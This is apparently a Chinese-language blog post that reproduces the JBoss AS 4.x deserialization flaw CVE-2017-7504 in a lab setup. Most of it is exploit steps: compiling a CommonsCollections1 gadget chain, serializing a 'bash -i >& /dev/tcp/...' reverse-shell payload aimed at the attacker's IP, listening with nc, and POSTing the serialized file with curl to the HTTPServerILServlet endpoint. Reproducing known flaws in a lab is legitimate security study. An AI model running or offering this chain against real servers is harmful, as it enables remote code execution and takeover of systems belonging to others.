JBOSS反序列化漏洞复现(CVE-2017-7504)

2022-02-19 10:16:51 浏览数 (1)

原理

JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

影响版本

JBoss AS 4.x及之前版本

漏洞复现

攻击机:xx.xx.xx.xx

靶机:x.x.x.x

靶机搭建和exp工具-->https://cloud.tencent.com/developer/article/1944746

反弹shell

编译并生成序列化数据,生成ExampleCommonsCollections1WithHashMap.class文件

javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java

序列化恶意数据至文件,生成ExampleCommonsCollections1WithHashMap.ser文件

java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/xx.xx.xx.xx/9963 0>&1" 注:xx.xx.xx.xx是攻击者IP,端口为反弹shell端口

攻击机监听9963端口

nc -lvnp 9963

ExampleCommonsCollections1WithHashMap.ser发送到靶机

curl http://http://x.x.x.x:9700/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser --data-binary 以二进制的方式post数据

发送成功,获取反弹shell。

0 人点赞